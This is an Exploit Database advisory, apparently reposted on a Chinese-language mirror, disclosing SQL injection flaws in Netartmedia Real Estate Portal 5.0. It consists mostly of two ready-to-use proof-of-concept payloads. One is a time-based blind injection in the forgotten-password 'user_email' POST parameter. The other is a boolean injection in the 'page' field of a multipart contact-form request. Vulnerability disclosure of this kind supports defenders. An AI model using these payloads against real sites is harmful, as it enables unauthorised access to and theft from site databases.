Netartmedia Real Estate Portal 5.0 – SQL Injection

• Exploit Database
• 41 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-03-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46563/

• # Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection
  # Date: 19.03.2019
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor Homepage: https://www.netartmedia.net/realestate/
  # Demo Site: https://www.phpscriptdemos.com/realestate/
  # Version: 5.0
  # Tested on: Kali Linux
  # CVE: N/A
  # Description: The real estate portal software is made to be
  multi-language, the main site can show multiple languages and let the site
  visitors choose their preferred language.
  
  ----- PoC 1: SQLi -----
  
  Request: http://localhost/[PATH]/index.php
  Parameter: user_email (POST)
  Payload:
  ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z'
  OR SLEEP(5)#
  
  ----- PoC 2: SQLi -----
  
  Request: http://localhost/[PATH]/index.php
  Parameter: MULTIPART page ((custom) POST
  Payload:
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="SubmitContact"
  
  1
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="code"
  
  94102
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="email"
  
  sample@email.tst
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="message"
  
  20
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="name"
  
  ${alpharand}
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="page"
  
  en_Contact-2228' OR 3801=3801-- eISZ
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="phone"
  
  555-666-0606
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0
  Content-Disposition: form-data; name="subject"
  
  1
  ------WebKitFormBoundaryYUBPFrrBhV4S4pf0--